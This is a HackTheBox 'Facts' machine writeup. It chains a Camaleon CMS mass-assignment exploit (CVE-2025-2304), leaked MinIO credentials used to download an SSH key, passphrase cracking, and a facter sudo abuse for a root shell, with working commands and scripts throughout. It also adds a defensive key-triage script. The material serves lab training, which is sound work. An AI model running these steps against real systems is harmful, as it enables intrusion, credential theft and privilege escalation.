## https://sploitus.com/exploit?id=01E82C1C-4154-5D5C-9167-7FD9593B9E23
# HackTheBox - Facts Machine Writeup

![HackTheBox](https://img.shields.io/badge/HackTheBox-Facts-brightgreen?style=for-the-badge&logo=hackthebox)
![Difficulty](https://img.shields.io/badge/Difficulty-Easy-green?style=for-the-badge)
![OS](https://img.shields.io/badge/OS-Linux-blue?style=for-the-badge&logo=linux)

## Machine Info

| Field       | Details          |
|-------------|------------------|
| Name        | Facts            |
| OS          | Linux            |
| Difficulty  | Easy             |
| Release     | Season 10        |
| Retired     | No               |

---

## Attack Chain Overview

```
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root
```

---

## Tools Used

| Tool | Purpose |
|------|---------|
| Nmap | Port scanning & service detection |
| Feroxbuster | Web directory enumeration |
| CVE-2025-2304 PoC | Camaleon CMS privilege escalation |
| boto3 (Python) | MinIO/S3 enumeration & file download |
| ssh2john | Convert SSH key to crackable hash |
| John the Ripper | Crack SSH key passphrase |
| facter | Privilege escalation via sudo misconfiguration |

---

## Reconnaissance

### Port Scan

```bash
# <target-ip> stands in for the machine's IP address (redacted in the original)
sudo nmap -p- --min-rate 5000 -T4 <target-ip> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <target-ip>
```

**Results:**

```
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
```

```bash
echo "<target-ip> facts.htb" | sudo tee -a /etc/hosts
```

---

## Web Enumeration

```bash
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml
```

**Key findings:**
- CMS identified: **Camaleon CMS 2.9.0**
- Admin panel: `http://facts.htb/admin/login`
- Registration page: `http://facts.htb/admin/register`

---

## Initial Access

### Step 1 - Register an Account

Visit `http://facts.htb/admin/register` and create an account. Note that there is a captcha, so register via the browser rather than a script.

### Step 2 - CVE-2025-2304 (Mass Assignment Privilege Escalation)

The `updated_ajax` endpoint uses `permit!`, which accepts every submitted parameter, including `role`, so an ordinary user can update their own role.

```bash
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
# <username> and <password> are the account registered in Step 1
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e
```

**Output:**
```
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321
```

---

## Cloud Enumeration - MinIO S3

Port 54321 runs a MinIO S3-compatible server. Using the leaked credentials:

```python
import boto3
from botocore.client import Config

# MinIO speaks the S3 API, so a standard boto3 client works once endpoint_url points at it.
s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),   # MinIO expects SigV4 request signing
    region_name='us-east-1'
)

# Walk the whole 'internal' bucket page by page and download every object,
# skipping MinIO's own 'info-etags' bookkeeping entries.
paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            # Flatten the key into a filename, e.g. .ssh/id_ed25519 -> /tmp/.ssh_id_ed25519
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))
```

**Key files found:**
```
.ssh/authorized_keys
.ssh/id_ed25519        ← SSH private key
.profile
.bashrc
```

---

## SSH Key Cracking

```bash
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

**Cracked passphrase:** `dragonballz`
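The two findings above (private keys sitting in a bucket, and a passphrase weak enough to crack) are what a defender should be scanning bucket contents for. The following is an added example, not code from the writeup or the box: it parses the unencrypted header of an `openssh-key-v1` private key to see whether it is passphrase-protected and with which KDF, and triages a bucket listing for exposed key material. The bucket listing, `build_header` helper and the `SENSITIVE` path patterns are constructed for the example.

```python
import base64
import re
import struct

PEM_HEAD = "-----BEGIN OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"
SENSITIVE = re.compile(r"(^|/)(\.ssh/)?(id_[a-z0-9]+|authorized_keys)$|(^|/)\.(env|netrc)$")

def _sshstr(b):  # SSH wire "string": uint32 big-endian length + bytes
    return struct.pack(">I", len(b)) + b

def build_header(cipher, kdf, salt=b"", rounds=0):
    # Constructed test input: only the openssh-key-v1 header fields, no real key material.
    opts = _sshstr(salt) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = MAGIC + _sshstr(cipher) + _sshstr(kdf) + _sshstr(opts) + struct.pack(">I", 1)
    return f"{PEM_HEAD}\n{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----\n"

def parse_openssh_key_header(pem):
    # Cipher and KDF names sit in the unencrypted header, so no passphrase is needed to read them.
    blob = base64.b64decode("".join(ln for ln in pem.splitlines() if not ln.startswith("-----")))
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 private key")
    fields, off = [], len(MAGIC)
    for _ in range(3):  # ciphername, kdfname, kdfoptions
        (n,) = struct.unpack(">I", blob[off:off + 4])
        fields.append(blob[off + 4:off + 4 + n])
        off += 4 + n
    cipher, kdf, opts = fields[0].decode(), fields[1].decode(), fields[2]
    # kdfoptions for bcrypt = string salt, uint32 rounds; the rounds are the last 4 bytes
    rounds = struct.unpack(">I", opts[-4:])[0] if kdf == "bcrypt" else None
    verdict = ("UNENCRYPTED private key" if cipher == "none"
               else f"passphrase-protected ({cipher}, {kdf} with {rounds} rounds)")
    return {"cipher": cipher, "kdf": kdf, "rounds": rounds, "encrypted": cipher != "none", "verdict": verdict}

def triage_bucket(objects):
    # objects: object key -> downloaded content. Returns one finding per sensitive object.
    findings = []
    for key, content in objects.items():
        if "info-etags" in key or not SENSITIVE.search(key):  # skip MinIO bookkeeping
            continue
        verdict = (parse_openssh_key_header(content)["verdict"]
                   if content.startswith(PEM_HEAD) else "sensitive file exposed")
        findings.append(f"{key}: {verdict}")
    return findings

SAMPLE_OBJECTS = {  # constructed listing mirroring the writeup's layout, not the real bucket
    ".ssh/id_ed25519": build_header(b"aes256-ctr", b"bcrypt", b"\x00" * 16, 16),
    ".ssh/authorized_keys": "ssh-ed25519 AAAA...example user@host\n",
    "backup/id_rsa": build_header(b"none", b"none"),
    "info-etags/abc": "{}",
}
```

A key reported as `UNENCRYPTED` needs no cracking at all, and a low bcrypt round count is what makes a rockyou-style dictionary run against an encrypted key fast.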

---

## User Shell

```bash
ssh -i /tmp/.ssh_id_ed25519 trivia@facts.htb
# Enter passphrase: dragonballz
```

```bash
cat /home/william/user.txt
```

---

## Privilege Escalation

### Enumeration

```bash
sudo -l
```

```
(ALL) NOPASSWD: /usr/bin/facter
```

### Exploitation - facter Custom Fact (Ruby Code Execution)

Facter loads custom facts as Ruby scripts. Since we can run it as root with no password, we inject arbitrary Ruby code:

```bash
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn
```

**Root shell obtained!**

```bash
whoami   # root
cat /root/root.txt
```

---

## Key Takeaways

- **Mass assignment** vulnerabilities allow privilege escalation when input is not properly filtered
- **Misconfigured S3/MinIO** buckets can expose sensitive files including SSH private keys
- **Weak passphrases** on SSH keys can be cracked with common wordlists like rockyou
- **NOPASSWD sudo** binaries must always be investigated for abuse potential
- **Chaining small misconfigurations** can lead to full system compromise

---

## References

- [CVE-2025-2304 - Camaleon CMS Mass Assignment](https://nvd.nist.gov/vuln/detail/CVE-2025-2304)
- [GTFOBins - facter](https://gtfobins.github.io/)
- [HackTheBox](https://www.hackthebox.com)

---

*This writeup is for educational purposes only. Always perform security testing on systems you own or have explicit permission to test.*